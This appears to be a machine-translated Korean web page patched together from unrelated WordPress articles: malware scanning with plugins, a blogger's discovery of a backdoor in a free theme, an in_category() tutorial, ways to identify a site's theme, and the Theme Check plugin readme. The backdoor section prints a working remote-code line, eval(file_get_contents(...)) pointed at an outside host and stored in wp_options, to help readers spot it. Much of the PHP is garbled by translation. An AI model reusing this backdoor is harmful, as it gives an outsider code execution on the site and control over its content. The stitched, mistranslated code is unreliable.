사이트에 악성 바이러스가 없는지 주기적으로 확인하는 것이 필요하며 이는 자긍심 있는 웹마스터의 첫 번째 계명입니다. 깨끗한 Twenty Eleven 테마를 사용해도 시간이 지남에 따라 감염되지 않은 것도 사실입니다. 이 현상은 WordPress 엔진 자체가 원래 온라인 게시용으로 설계되었기 때문에 발생할 수 있으며 가장 자주 발생합니다. 따라서 다시 확인하고 사이트와 데이터베이스의 복사본을 만들어도 아프지 않습니다.

예를 들어, 나는 (물론 얼마 후) 나 자신을 위해 한 가지 결론을 내렸습니다. 좋은 호스트가 필요하면 예약 문제가 저절로 사라질 것입니다. 이제 데이터베이스나 사이트를 백업할 필요가 없습니다. 호스팅 업체에서 자동으로 모든 작업을 수행합니다. 원하는 경우 언제든지 블로그 섹션의 복사본을 주문하거나(뿐만 아니라) 이 복사본을 다운로드하거나 제어판에서 직접 블로그를 복원할 수 있습니다. 즉, 백업을 다운로드할 필요가 없으며 백업, 복원 등 모든 것이 자동으로 발생합니다. 내 블로그에 바이러스가 언제 나타났는지 요일별뿐만 아니라 시간별로 추적하여 그에 따른 제거 조치를 취할 수 있어 편리합니다.

좋은 소식부터 시작하겠습니다. 제가 사용한 플러그인은 최소 2개입니다. 좋은 결과악성 코드 탐지 및 현지화. 이들은 AntiVirus 및 Exploit Scanner 플러그인입니다. 블로그에 얼마나 나쁜 코드가 있는지 믿을 수 없을 것입니다! 그러나 도그마로 확인한 후 모든 결과 정보를 취하지 마십시오. 이러한 플러그인이 감지하는 많은 행은 실제로 자체적으로 나쁜 것을 전달하지 않습니다. 플러그인이 몇 줄에 질문하는 것뿐입니다. 그게 전부입니다. 이를 확인하려면 플러그인이 악성으로 식별한 조각을 수동으로 확인하십시오. 따라서 플러그인을 확인할 때 안티바이러스 get_cache_file() 함수에 대한 간단한 호출조차도 플러그인에 의해 이미 의심스러운 것으로 판명되었습니다. 따라서 모든 검사 결과를 수동으로 추적해야 합니다. 그러나 예를 들어 이것은 실제로 감염된 링크이므로 제거해야 합니다.

바이러스인지 아니면 바이러스여야 하는지 어떻게 알 수 있습니까? 모든 것이 매우 간단합니다. 깨끗한 템플릿(있는 경우)을 비교하고 설치되어 이미 일부 변경이 적용된 템플릿과(파일별로) 비교합니다. 직접적으로 문자 그대로 비교할 필요는 없습니다. 검색을 사용하여 플러그인이 강조 표시된 줄이 깨끗한 템플릿에 포함되어 있는지 확인하기만 하면 됩니다. 있는 경우 "바이러스가 아닙니다" 버튼을 클릭하십시오. 그러면 다음 검사에서 이 줄이 고려되지 않습니다.

다음은 내가 시도한 두 번째 플러그인의 예입니다. 익스플로잇 스캐너

보시다시피 여기에서 모든 것이 훨씬 더 무시됩니다. 나에게 이 결과는 충격적이었다. 하지만 그게 다가 아닙니다. 플러그인에는 확인과 같은 기능이 있습니다. 따라서 켜면 블로그가 텍스트와 최대 몇 개의 CSS 테이블로 구성되어야 합니다. 따라서 플러그인 작성자가 여기에 보안을 과도하게 적용한 것 같습니다. 플러그인이 감염된 것으로 의심되는 조각만 표시하고 치료하지 않는 것이 좋습니다.

노란색으로 강조 표시된 모든 라인을 분석한 후 악성 코드(악성 코드)를 쉽게 감지할 수 있습니다. 청소 방법은 여전히 ​​​​동일합니다. 선택한 코드를 사이트 백업과 비교하고(참조) 불일치를 발견하면 직접 수행했는지 아니면 누군가가 수행했는지 확인하십시오. 이는 더 이상 좋지 않으며 바이러스로 밝혀질 수 있습니다. WordPress 개발자조차도 이 특정 플러그인으로 사이트에서 악성 코드를 확인하는 것이 좋습니다. 그러나 예를 들어 플러그인이 감염된 코드로 감지할 수 있는 iframe의 본문에 이러한 무해한 삽입이 있습니다. 그러나 실제로 이 줄이 없으면 블로그의 이 섹션이 제대로 작동하지 않습니다.

맬웨어가 블로그 파일에 어떻게 침투할 수 있으며 정의상 무엇입니까? 맬웨어라는 단어는 말 그대로 - 악의 있는 소프트웨어 , 영어 악성 소프트웨어에서. 이는 사이트 및 해당 콘텐츠에 대한 무단 액세스에 사용할 수 있는 모든 소프트웨어입니다. 훈련된 평균 해커의 경우, 특히 등록 후에 사이트를 해킹하는 것이 어렵지 않을 것이라고 상상할 수 있습니다. 그런 다음 블로그의 내용을 원하는 대로 수정할 수 있습니다. 교육이 됩니다.

악성 멀웨어는 설치한 플러그인에도 삽입될 수 있습니다. 알수없는 출처, 그리고 때로는 확인하지 않고 작성자를 신뢰하는 스크립트에서. 가장 무해한 맬웨어는 사이트에 설치한 일부 모듈의 작성자에 대한 링크입니다. 그리고 저자 자신이 그러한 링크가 존재한다고 경고하지 않았다면 이것은 이미 순수한 바이러스입니다.

그래서 테스트 블로그에 설치했습니다. 새로운 테마, 그리고 사이트 지하에 있는 어떤 종류의 남성 클럽에 대한 무해한 링크 하나를 제거한 후에는 전혀 열리지 않았고 메인 페이지에 "링크를 삭제할 권리가 없습니다."라는 문구가 표시되었습니다. 여기 당신을 위한 무료 테마가 있습니다. 이러한 왼쪽 링크를 제거하는 방법에 대해 읽을 수 있습니다.

데이터베이스는 악성 코드를 실행하는 데에도 사용될 수 있습니다. 스팸 링크는 게시물이나 댓글에도 매우 자주 추가됩니다. 이러한 링크는 일반적으로 다음과 같은 경우 숨겨집니다. CSS 도움말미숙한 관리자가 볼 수 없도록 검색 시스템즉시 구별하십시오. 물론 여기에는 라이센스가 부여되고 확인되고 여러 번 재확인되는 스팸 방지와 같은 모든 안티 스팸이 작동합니다. 해커는 이미지 파일 확장자가 있는 파일을 다운로드하여 활성화된 플러그인의 코드에 추가할 수 있습니다. 따라서 파일에 php 확장자가 없어도 해당 파일의 코드를 실행할 수 있습니다.

맬웨어에 대해 알게 된 또 다른 간단한 도구인 TAC(테마 진위 검사기) 플러그인이 있습니다. 가볍고 강력하지만 활성 상태가 아닌 주제만 확인합니다. 나머지 디렉토리에는 영향을 미치지 않으며 이것이 마이너스입니다. 이 플러그인으로 현재 테마를 확인하여 얻은 내용은 다음과 같습니다.

활성 주제에 두 개의 경고가 있고 다른 것은 없습니다. 악성 코드가 없습니다. 그건 그렇고, 이것들은 스 니펫의 품질을 향상시키기 위해 Google의 조언에 따라 직접 삽입 한 링크입니다 (개인 데이터 표시, 조직 주소 등). 그러나 이것은 테마 파일을 확인하는 것일 뿐이며 다른 디렉토리에서 수행되는 작업은 다른 플러그인이나 온라인 서비스의 도움을 받아 알아내야 합니다. 예를 들어 Google의 Yandex Webmaster 또는 이와 유사한 서비스(신뢰할 가치가 있음)가 있습니다. 웹 리소스에 악성 포함 여부를 확인하는 기능이 있으며 효율적으로 수행합니다. 그러나 이것이 충분하지 않다면 결과를 다른 서비스의 결과와 비교하고 결론을 도출하십시오.

어떤 이유로 플러그인이 아닌 Yandex를 믿고 싶습니다. 또 다른 좋은 리소스는 http://2ip.ru/site-virus-scanner/입니다. 내 블로그 중 하나를 확인한 후 발견한 내용은 다음과 같습니다.

의심되는 경우 여기에서 악성 코드에 대한 개별 파일을 확인할 수도 있습니다. 일반적으로 서비스는 좋습니다.

위의 모든 것에서 나는 다음과 같은 결론을 내릴 것입니다.

1. 악성코드의 출현을 방지하기 위해서는 우선 플러그인, 테마 등 파일 다운로드를 위한 신뢰할 수 있는 서비스를 이용해야 합니다.

2. 업로드된 타사 파일을 포함하여 데이터베이스, 콘텐츠, 관리자 패널 등 사이트에 포함된 모든 항목의 백업 복사본을 정기적으로 만듭니다.

3. WordPress에서 제공하는 업데이트를 즐기십시오. 항상 기능적으로 정당화되는 것은 아니지만 적어도 바이러스가 없습니다. 그러나 업데이트하면 존재할 수 있는 바이러스를 제거할 수 있습니다.

4. 사용하지 않은 테마, 플러그인, 이미지 및 파일, 후회 없이 삭제 - 이것은 당신이 결코 추측할 수 없는 맬웨어의 또 다른 대안입니다.

5. FTP 액세스, PhpAdmin 로그인, 관리자 패널 및 일반적으로 귀하 외에는 아무도 액세스할 수 없는 곳에서 비밀번호를 보호해야 합니다.

6. (이 욕망이 하늘만큼 크더라도) WordPress 코어 파일을 변경하거나 교체하지 마십시오. 개발자는 무엇이 작동하고 어떻게 작동해야 하는지 더 잘 압니다.

7. 바이러스 탐지 및 제거 후 모든 비밀번호를 변경합니다. 나는 당신이 다른 레지스터와 특수 문자로 148자의 암호를 만들고 싶어 할 것이라고 생각합니다. 하지만 너무 휘둘리지 마세요 복잡한 비밀번호, 당신은 그것을 잃을 수 있습니다. 그러면 모든 것을 복원해야 합니다. 이것은 그다지 유쾌하지 않습니다.

바이러스를 제거하는 데 도움이 되는 내가 설명한 이러한 모든 방법과 구성 요소는 물론 무료이며 거의 집에서 만든 것이며 물론 사이트가 제거될 것이라는 100% 보장을 제공하지 않습니다. 악성 삽입물. 따라서 이미 블로그 청소가 걱정된다면 서비스와 같은 전문가에게 문의하는 것이 좋습니다. 수쿠리(http://sucuri.net/). 여기에서 귀하의 사이트가 신중하게 모니터링되고 실용적인 권장 사항이 제공되며 이는 서신으로 보내질 것이며 사이트를 직접 청소하고 싶지 않다면 가능한 한 최선을 다할 전문가가 서비스를 제공합니다 4시간 이내:

음, 이것은 모니터링 후 내 테스트 블로그가 어떻게 생겼는지이며, 이것은 다른 방법(homebrew)이 항상 다른 결과를 표시한다는 사실에도 불구하고입니다. 보시다시피 테스트는 무료이지만 바이러스가 발견되면 사이트에 피해를 주지 않고 바이러스 제거 비용을 지불해야 합니다(물론 블로그에서 맬웨어를 제거하는 전문가가 아닌 경우).

해커가 경계하고 있고 바이러스가 지속적으로 업그레이드되고 있으며 모든 것을 스스로 추적하는 것은 불가능하다는 점을 다시 한 번 강조합니다. 모든 혁신은 매우 조심스럽게 숨겨지고 위장되어 팀만 공개할 수 있습니다! 많은 사람들이 배우는 독학 블로거가 아니라 전문가입니다. 그렇기 때문에 맬웨어를 수동으로 감지하고 제거하는 것이 매우 비효율적입니다. 경험이 없고 결과가 없지만 바이러스가 있습니다. 사용 라이센스 프로그램위험 제거를 전문가에게 맡기십시오.

안녕하세요 친구. 웹사이트와 블로그에 사용하는 무료 WordPress 템플릿이 정말 안전하고 숨겨진 위협과 악성 코드가 포함되어 있지 않다고 확신하십니까? 당신은 이것을 완전히 확신합니까? 전적으로?)

그들이 템플릿을 실행하고 템플릿에서 숨겨진 링크를 제거하면 완료되었다고 생각합니다. 바이러스 백신으로 사이트 파일을 주기적으로 스캔하고 보안 탭에서 Yandex 웹마스터 도구를 살펴보면 안심할 수 있는 다음과 같은 메시지가 표시됩니다. 사이트에서 악성 코드가 발견되지 않았습니다.«.

저도 그렇게 생각했습니다. 화나게 하고 싶지는 않지만...

무료 WordPress 테마에 숨겨진 위험한 코드

이것은 내가 지난 주에 내 호스팅에서 메일로 받은 편지입니다. 최근에 그들은 모든 사이트 파일에 악성 콘텐츠가 있는지 정기적으로 검사하는 방법을 도입했지만 내 안에서 이 콘텐츠를 발견했습니다!

그것은 모두 어느 날 내가 내 사이트에 가서 실행할 수 없다는 사실에서 시작되었습니다. php 확장자를 가진 찾을 수 없는 파일에 대한 욕설이 나왔습니다. 조금 긴장한 상태에서 호스팅 사이트와 함께 폴더의 내용을 연구하고 즉시 문제를 발견했습니다. 내 fuctions.php 템플릿 파일의 이름이 functions.php.malware로 변경되었습니다. 즉, 모호하게 암시되었습니다. 바이러스 백신 또는 이와 유사한 것이 여기에서 작동했습니다) 메일을 입력하고 호스팅 업체에서 위의 보고서를 찾았습니다.

우선 이 파일을 확인하기 시작했고, 그 내용을 살펴보고, 각종 백신, 수십 개의 온라인 바이러스 검사 서비스 등으로 검사했습니다. - 결국 나는 아무것도 찾지 못했고 모두가 만장일치로 파일이 완전히 안전하다고 주장했습니다. 물론 제가 뭔가를 망쳤다며 호스팅 업체에 의심을 표명했지만 만일을 대비해 악성 코드 발견에 대한 보고서를 제출해 달라고 요청했습니다.

그리고 이것이 그들이 나에게 말한 것입니다.

이 코드에 대한 정보를 구글에 가보니 진지하게 고민이 되네요...

템플릿에서 악성 코드를 찾는 방법

결과적으로 이것은 이해 당사자가 귀하의 사이트로 데이터를 전송하고 귀하가 알지 못하는 사이에 페이지의 내용을 변경할 수 있도록 하는 정말 사소하지 않은 속임수입니다! 무료 템플릿을 사용하는 경우 다음 코드에 대해 functions.php를 확인하는 것이 좋습니다.:

add_filter('the_content', '_bloginfo', 10001);
함수 _bloginfo($content)(
글로벌 $post;
if(is_single() &&( [이메일 보호됨](get_option('블로그 옵션'))) !== 거짓)(
반환 $ co;
) 그렇지 않으면 $content를 반환합니다.
}

php에 대한 아주 얕은 지식으로도 블로그 포스트 페이지에만 콘텐츠를 표시하는 역할을 하는 전역 변수 post 및 콘텐츠에 연결된 특정 필터가 생성되고 있음을 알 수 있습니다(is_single 조건). 이미 의심스럽죠? 자, 이제 이것이 무엇을 표시하는지 봅시다. 주어진 코드우리 웹사이트에.

데이터베이스에서 요청한 흥미로운 블로그 옵션도 매우 의심스러워 보입니다. MySQL 데이터베이스로 이동하여 wp_options라는 테이블을 찾습니다. 접두사를 변경하지 않은 경우 기본적으로 다음과 같이 표시됩니다. 그리고 그 안에서 우리는 blogoption이라고 하는 관심 라인을 찾습니다.

어쩜 이렇게 이쁘니! 다음 옵션이 표시됩니다.


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

저것들. 특정 사이트(또한 러시아어, 염두에 두십시오)에서 우리는 무엇이든 운반할 수 있는 콘텐츠를 반환합니다! 링크, 악성코드, 변경된 텍스트 등 사이트에 액세스할 때 사이트 자체에서 403 액세스 오류가 발생하는데 이는 놀라운 일이 아닙니다. 물론 데이터베이스에서도 이 옵션을 제거했습니다.

피해자의 정보에 따르면 기사의 내용은 일반적으로 점 "." 대신 한 번만 수정하면 반환됩니다. 오픈 링크가 텍스트에 마스킹되었습니다! 그런데 이 옵션은 템플릿 자체가 설치될 때 데이터베이스에 기록되고 이를 수행하는 코드는 안전하게 자체 파괴됩니다. 그리고 나는 2년 동안 그런 쓰레기들과 함께 살았고, 그 동안 단 하나의 안티바이러스나 서비스도 나에게 이 위협을 드러내지 않았습니다. 솔직히 말해서, 이 기술이 나에게 효과가 있었는지, 또는 내 보안 플러그인이 이 가능성을 차단했는지(또는 WordPressa 업데이트 중 하나가 이 구멍을 닫았는지) 알아차리지 못했지만 여전히 불쾌합니다.

무료 치즈의 도덕

템플릿의 "번역가"(또는 카탈로그에 게시하는 사람들)의 정교함이 어떻습니까? 바닥글에서 링크를 잘라내는 것은 당신을 위한 것이 아닙니다) 내 템플릿을 어디에서 다운로드했는지 기억이 나지 않는 것은 유감입니다. 오래전입니다. 그리고 그 당시에 지금과 같은 경험을했다면 무료 템플릿을 사용하지 않거나 극단적 인 경우 알 수없는 소스에서 다운로드하지 않을 것입니다!

동일한 템플릿에서 15-20달러에 공식 프리미엄 템플릿을 구입하고 거기에 구멍과 암호화된 링크가 없다는 것을 알고 평화롭게 사는 것이 더 쉽고, 취약점이 있더라도 개발자는 확실히 이러한 업데이트를 출시할 것입니다. 구멍이 닫힙니다. ( 그건 그렇고, Artem은 최근 프리미엄 템플릿에 대해 이야기하고 관심있는 사람들을 위해 잔인한 할인을위한 프로모션 코드를 배포하는 기사를 게시했습니다.)

레코드를 표시하고 있고 변경해야 한다고 상상해 보십시오. 모습기준표에 따라. 예를 들어, 기사 작성자에 대한 정보를 표시하는 "ABOUT THE AUTHOR" 블록이 있지만, 예를 들어 이것이 필요하지 않은 카테고리의 게시물 아래에서 이 블록을 보고 싶지 않을 수 있습니다. 특정 카테고리, 썸네일 등의 댓글을 비활성화할 수도 있습니다. 그것은 모두 당신의 필요와 환상에 달려 있습니다. 개인적으로 저는 이 조건을 아주 자주 사용합니다.

범주에 따라 항목을 필터링하려면 이 기능이 도움이 될 것입니다. in_category(). 이 기능은 현재 또는 주어진 항목이 원하는 범주, 웰 또는 여러 범주에 속하는지 확인합니다. 대부분의 경우 이 함수는 파일로 출력됩니다. 단일.php, 그는 기록을 표시하는 책임이 있기 때문입니다.

함수를 사용하는 가장 간단한 방법은 다음과 같습니다. 이 코드를 single.php 파일에 추가합니다. 필요한 경우 PHP에서 태그를 묶습니다.

PHP 태그는 다음과 같습니다.

테마가 HTML 코드를 주로 사용하는 경우 변경하지 않고 아래 코드를 붙여넣습니다. PHP를 주로 사용하는 경우 코드를 묶은 태그를 제거할 수 있습니다.

이 코드에서는 현재 게시물이 ID - 12인 카테고리에 속하는 경우 무언가가 표시되어야 한다는 조건을 설정했습니다. 원하는 것을 중괄호 안에 추가하십시오. 그것은 PHP 코드여야 합니다. 그것이 어렵고 HTML 코드를 추가해야 하는 경우 동일한 PHP 태그로 코드를 분리하면 코드는 다음과 같이 됩니다.

//여기에 일반적인 HTML 코드 또는 텍스트만 작성합니다.

카테고리의 ID를 확인하려면 관리자 패널의 카테고리 목록으로 이동하여 원하는 카테고리 위로 마우스를 가져가야 합니다. 브라우저 창의 맨 아래 오른쪽에 ID=1, 즉 이 카테고리의 ID가 1인 링크가 나타납니다.

여러 범주를 지정해야 하는 경우 쉼표로 구분하여 지정하십시오. "IF - THEN" 조건을 생성해야 할 수도 있습니다. 그러면 코드는 다음과 같습니다.

루브릭 12에 게시물 썸네일을 표시하고 다른 루브릭의 다른 게시물에 있는 텍스트의 첫 번째 그림을 표시해야 한다고 상상해 보십시오. 이런 일이 발생하고 어떻게 해야 합니까? 위의 코드로. 기사의 기록에서 첫 번째 이미지의 출력에 대해 읽을 수 있습니다.

이제 이 기능에 추가할 수 있는 기능을 하나 더 보여드리고자 합니다. 루브릭에는 하위 범주, 즉 하위 범주가 있습니다. 항목이 하위 범주 중 하나에 속하면 조건이 이를 우회합니다. 이것이 필요한 것이라면 아무 것도 만질 수 없지만 그럼에도 불구하고 조건이 부제목에 대해 작동해야 한다면 조건에 추가를 추가해야 합니다. 먼저 조건 자체에 다음 부분을 추가해야 합니다. || post_is_in_descendant_category(12). 이것은 하위 범주를 확인할 새 함수에 대한 호출입니다. 완성된 코드는 다음과 같습니다.

새 함수가 작동하기 시작하려면 이 함수 자체에 대한 코드를 추가해야 합니다. 즉, 작성해야 합니다. 이렇게하려면 활성 테마가있는 폴더에서 파일을 찾으십시오. 기능.php, 사용자 정의 함수가 포함되어 있습니다. PHP에 익숙하지 않은 경우 파일의 맨 끝에 코드를 추가해야 하지만 닫는 부분이 있는 경우 PHP태그 - ?> , 그 앞에 추가해야 합니다. 코드 자체는 다음과 같습니다.

함수 post_is_in_descendant_category($cats, $_post = null) ( foreach ((array) $cats as $cat) ( // get_term_children()은 정수 ID만 허용 $descendants = get_term_children((int) $cat, "category"); if ($descendants && in_category($descendants, $_post)) return true; ) return false; )

모든 것이 올바르게 완료되면 조건에 따라 특정 카테고리 및 해당 하위 카테고리에 대한 게시물이 선택됩니다.

오래 전에 나는이 기사를 쓰기 시작했지만 모든 손이 끝내지 못하고 하나, 두 번째가 중단되었습니다. 마침내 기사가 끝났고 아마도 많은 사람들이 문제를 해결하는 데 도움이 될 것입니다.

그게 다야, 관심을 가져 주셔서 감사합니다. 🙂

특정 사이트에서 어떤 테마를 사용하는지 궁금하신가요?

종종 완벽한 테마를 찾기 위해 완성된 다른 프로젝트를 살펴보고 비슷한 것을 찾거나 같은 테마로 사이트를 만들고 우리 자신의 개별 디자인만 사용합니다.

이 튜토리얼에서는 이 WordPress 사이트에서 사용 중인 테마를 찾는 데 사용할 수 있는 도구와 트릭을 보여줍니다.

방법 1: IsItWP 인증 사이트

가장 쉬운 방법은 isitwp.com으로 이동하여 관심 있는 사이트를 확인하는 것입니다.

이것은 WordPress에서 어떤 테마를 사용하고 있는지, WordPress가 사이트에서 사용 중인지 여부를 보여주는 온라인 도구입니다.

사이트에서 WordPress를 실행 중인 경우 IsItWP는 현재 테마의 이름을 찾으려고 시도합니다.

또한 사이트에서 사용되는 활성 플러그인을 찾으려고 시도합니다.

운이 좋고 사용자 지정 또는 하위 테마가 아닌 경우 IsItWP에서 테마 이름을 제공하고 해당 테마를 추가로 검색할 수 있습니다.

방법 2. 수동으로 정의

때때로 사이트 소유자 또는 개발자가 기본 이름을 변경합니다. 워드프레스 테마. 이 경우 IsItWP와 같은 도구는 도움이 되지 않습니다.

그러나 그럼에도 불구하고 사이트 코드에는 어떤 종류의 테마가 설치되어 있는지 파악하는 데 도움이 되는 다양한 힌트가 있을 수 있습니다.

봅시다.

모든 WordPress 테마에는 다음이 있어야 합니다. 스타일.css. 이 파일에는 일반적으로 테마 이름, 테마 작성자, 버전 및 테마 개발자 사이트를 나타내는 헤더가 포함되어 있습니다. 또한 테마가 사용하는 다른 CSS 템플릿을 지정합니다.

이 파일을 찾으려면 먼저 사이트 자체로 이동해야 합니다. 기본 페이지의 아무 곳이나 마우스 오른쪽 버튼으로 클릭하고 소스 코드 보기( 페이지 소스보기).

사이트 메인 페이지의 소스 코드가 브라우저의 새 탭에서 열립니다.

이제 다음과 같은 코드 줄을 찾아야 합니다.

작업을 더 쉽게 하기 위해 스니펫 코드 "로 이 탭을 검색할 수 있습니다. 테마". 이것은 디렉토리의 일부입니다. 스타일.css.

따라서 style.css 파일이 있는 경로를 찾을 수 있으며 이 파일을 브라우저의 새 탭에서 직접 열 수 있습니다.

style.css의 맨 위에는 제목이 있는 헤더가 있습니다(위에서 이야기했습니다). 테마에 대한 서비스 정보입니다. 다음과 같이 보입니다.

/* 테마 이름: 테마 이름 테마 URI: https://example.com 작성자: ThemeAuthorName 작성자 URI: https://example.com 설명: 내 테마는 포트폴리오 웹사이트를 위해 설계된 유연한 WordPress 테마입니다. 버전: 1.1.47 라이선스: GNU 일반 공중 라이선스 v2 이상 라이선스 URI: http://www.gnu.org/licenses/gpl-2.0.html 텍스트 도메인: hestia 태그: 블로그, 맞춤형 로고, 포트폴리오, 전자 상거래, rtl-language-support , 사후 형식, 그리드 레이아웃, 1열, 2열, 사용자 정의 배경, 사용자 정의 색상, 사용자 정의 헤더, 사용자 정의 메뉴, 추천 이미지 헤더, 추천 이미지, 유연한 헤더, 전체 너비 -템플릿, 스티커 포스트, 테마 옵션, 스레드 주석, 번역 준비 완료 */

이 블록에서 주제의 이름과 개발자의 주소를 찾을 수 있습니다. 그런 다음 인터넷에서이 주제를 찾는 것만 남아 있습니다.

방법 3. 상위 테마를 찾는 방법

많은 사이트에서 하위 테마를 사용하여 모양을 사용자 정의합니다. 그리고 이것은 매우 올바른 접근 방식입니다.

이 경우 파일을 찾은 경우 스타일.css하위 테마의 헤더에는 상위 테마에 대한 정보가 포함됩니다.

/* 테마 이름: My Child 테마 설명: Just a child 테마 저자: Peter Smith 저자 URL: 작성자의 블로그 또는 웹사이트 url 작성 템플릿: hestia 버전: 1.0 라이센스: GNU General Public License v2 이상 라이센스 URI: http:// /www.gnu.org/licenses/gpl-2.0.html 텍스트 도메인: my-child-theme */

위의 예에서 매개변수 " 주형"는 상위 테마 "Hestia"가 이 하위 테마에 사용됨을 의미합니다.

방법 2에서 설명한 소스 코드에서 상위 테마에 대해 배울 수도 있습니다. 코드에서 하위 테마뿐만 아니라 상위 테마에서도 style.css 파일에 대한 참조를 찾을 수 있습니다.

그러나 개발자가 style.css의 모든 헤더를 자체적으로 변경하려고 시도할 수 있다는 것을 잊지 마십시오. 이 경우 원래 테마를 결정하기가 매우 어려울 것입니다.

테마 확인 플러그인은 테마를 테스트하고 최신 테마 검토 표준에 맞는지 확인하는 쉬운 방법입니다. 그것으로, 당신은 할 수 있습니다 WordPress.org에서 테마 제출에 사용하는 것과 동일한 모든 자동 테스트 도구를 테마에서 실행합니다.

테스트는 간단한 관리자 메뉴를 통해 실행되며 모든 결과가 한 번에 표시됩니다. 이것은 테마 개발자 또는 테마가 최신 WordPress 테마 표준 및 사례를 지원하는지 확인하려는 사람에게 매우 편리합니다.

추적 포맷을 활성화하는 방법

테마 검토 팀은 테마를 검토하는 동안 이 플러그인을 사용하고 출력을 trac 티켓에 복사/붙여넣기합니다. trac 시스템에는 자체 마크업 언어가 있습니다.
Theme-Check에서 trac 형식을 활성화하려면 wp-config.php에서 몇 가지 변수를 정의해야 합니다.
TC_PRE그리고 TC_POST티켓 머리글 및 바닥글로 사용됩니다.
예:
define('TC_PRE', '테마 리뷰:[]
- 테마는 "define(\'WP_DEBUG\', true);"을 사용하여 검토해야 합니다. wp-config.php[]
— 테마 체크리스트(TC)의 테스트 데이터를 사용하여 테마를 검토해야 합니다.
——
‘);

Define("TC_POST", "질문, 의견 또는 피드백이 있는 경우 아래 연락처 세부 정보를 자유롭게 활용하세요.[] [] * 이 티켓에 대한 의견을 남겨주세요[] * 테마 검토 이메일로 이메일 보내기 list[] * Freenode에서 #wordpress-themes IRC 채널을 사용하세요.");

만약에 어느 하나이 두 변수 중 새로운 trac 체크박스가 옆에 나타납니다. 확인해 봐!단추.

자주 묻는 질문

버전 번호는 어떻게 되나요?

버전 번호는 작성에 사용된 지침의 개정 날짜입니다.

왜 나쁜 것으로 표시합니까?

"나쁜"것에 플래그를 지정하지 않습니다. 테마 확인은 테마 검토 지침을 준수하는지 테스트하는 불완전한 방법으로 설계되었습니다. 모든 테마가 이 가이드라인을 따라야 하는 것은 아닙니다. 확인 도구의 목적은 중앙 WordPress.org 테마 저장소에 업로드된 테마가 최신 WordPress 테마 표준을 충족하고 다양한 사이트에서 작동하는지 확인하는 것입니다.

많은 사이트에서 사용자 정의 테마를 사용하며 완벽하게 괜찮습니다. 그러나 대중이 다양한 종류의 사이트에서 사용하도록 의도된 테마는 다양한 환경에서 적절한 기능을 보장하기 위해 특정 최소 수준의 기능이 필요합니다. 테마 검토 지침은 그 목표를 염두에 두고 만들어졌습니다.

이 테마 검사기는 완벽하지 않으며 앞으로도 없을 것입니다. 테마 작성자 또는 테마를 보다 효과적으로 만들고자 하는 모든 사람을 돕기 위한 도구일 뿐입니다. WordPress.org에 제출된 모든 테마는 전문가 팀이 직접 검토합니다. 자동화된 테마 검사기는 절대적인 측정 시스템이 아니라 유용한 도구일 뿐입니다.

이 플러그인 하지 않습니다사용 지침을 결정합니다. 특정 테마 검토 지침과 관련된 모든 문제는 테마 만들기 사이트에서 논의해야 합니다.

리뷰

이것은 WordPress 테마를 개발하고 기본 WordPress 표준을 성공적으로 테스트하는 것을 정말 좋아하는 모든 사람을 위한 훌륭한 플러그인입니다. 오류는 "필수", "경고", "권장" 및 "정보"로 구분됩니다. 또한 이 오류의 기본 정보를 제공하고 문제가 어디에 있는지 이해할 수 있도록 합니다.

회원 및 개발자

테마 검사기는 오픈 소스 프로젝트입니다. 플러그인 개발에 기여한 기여자는 다음과 같습니다.

회원

변경 로그

20190801.1

  • 관리자 페이지에서 누락된 nonce 및 nonce 확인을 수정합니다. 플러그인 팀에 문제를 보고해 준 Steven Stern. 이것은 기술적으로 CSRF이지만 형식으로 수행할 수 있는 유일한 작업은 테마를 스캔하는 것이므로 이로 인해 발생하는 취약점은 없습니다.

20190208.1

  • 블록 편집기에 대한 새 스타일을 추가합니다. https://meta.trac.wordpress.org/ticket/3921 참조

20160523.1

  • 대시가 포함된 테마 이름 수정
  • 댓글 제거 변경 사항
  • 테마 리뷰 팀 및 다른 사람들에 의한 많은 변경. 전체 변경 목록은 Github를 참조하세요.

20151211.1

  • Github 및 그곳에서 발생한 모든 변경 사항과의 전체 동기화.
  • 4.4 더 이상 사용되지 않는 기능에 대한 릴리스입니다.

20140929.1

  • Automattic에서 Frank Klein의 새로운 확인 및 업데이트를 추가했습니다. 고마워 프랭크!
  • 더 이상 사용되지 않는 기능 목록 업데이트
  • 사용자 지정 검사: 보안을 위해 모든 add_settings는 살균 콜백을 사용해야 합니다.
  • 플러그인 영역 확인: 테마는 게시물 유형 또는 분류를 등록하거나 게시물 콘텐츠에 대한 단축 코드를 추가해서는 안 됩니다.
  • 위젯: register_sidebar에 대한 호출은 widgets_init 작업 후크에서 호출되어야 합니다.
  • 제목: 태그가 있어야 합니다. 그리고 아니 wp_title()에 대한 호출 이외의 다른 항목이 있습니다.
  • CDN: 일반 CDN 사용 여부 확인(권장만 해당)
  • 참고: 이전 URI가 유효하지 않아 플러그인 및 작성자 URI가 변경되었습니다. 이는 나중에 다시 변경될 수 있으며 내 사이트에 대한 URI는 일시적일 뿐입니다.

20131213.1

  • 플러그인에 의해 표시되지 않는 오류를 수정하고 모든 것에 "통과" 결과를 잘못 제공합니다.

20131212.1

  • 3.8 업데이트
  • 더 나은 I18N 지원을 위해 대부분의 파일이 변경되었으므로 언어 ​​파일은 번역을 다시 실행할 수 있을 때까지 일시적으로 제거되었습니다.

20121211.1

  • 3.5 업데이트
  • PayPal 버튼을 제거합니다.

20110805.1

  • TimThumb 검사가 제거되었습니다.
  • 이제 스크린샷이 파일 크기 및 크기와 함께 결과에서 미리보기로 표시됩니다.

20110602.2

  • 새 파일 목록 기능은 이제 숨겨진 폴더를 감지할 수 있습니다.
  • 더 나은 fopen 검사.
  • Tim Thumb 버전 범프

20110602.1

  • DOS/UNIX 줄 끝 스타일 검사는 이제 적절한 테마 업로드를 위한 요구 사항입니다.
  • Timthumb 버전 범프
  • GaryJ가 보고한 몇 가지 수정 사항
  • 3.2 사용되지 않는 기능 추가

20110412.1

  • 정규식 수정
  • 최신 바닥글 주입 해킹에 대한 검사가 추가되었습니다.
  • 새 콘텐츠 기능을 올바르게 사용하기 위해 태그 확인 수정
  • wporg 업로더 테마 확인에 대한 모든 변경 사항 동기화.
  • 업데이트된 수표 게시물 3.1. svn에 스크린샷 확인을 추가했습니다.
  • 경우에 따라 잘못된 오류를 반환하지 않도록 링크 확인 수정
  • rm wporg 업로더에서 문제를 일으키는 검사 중 하나(또한 불필요함)
  • 불필요한 기능을 체크베이스에서 main.php로 옮기십시오.
  • 사소한 서식 변경만(간격 등)
  • wp_link_pages() 검사 추가 + eval() 검사 수정

20110219.2

  • 병합된 새로운 UI 소품 Gua Bob
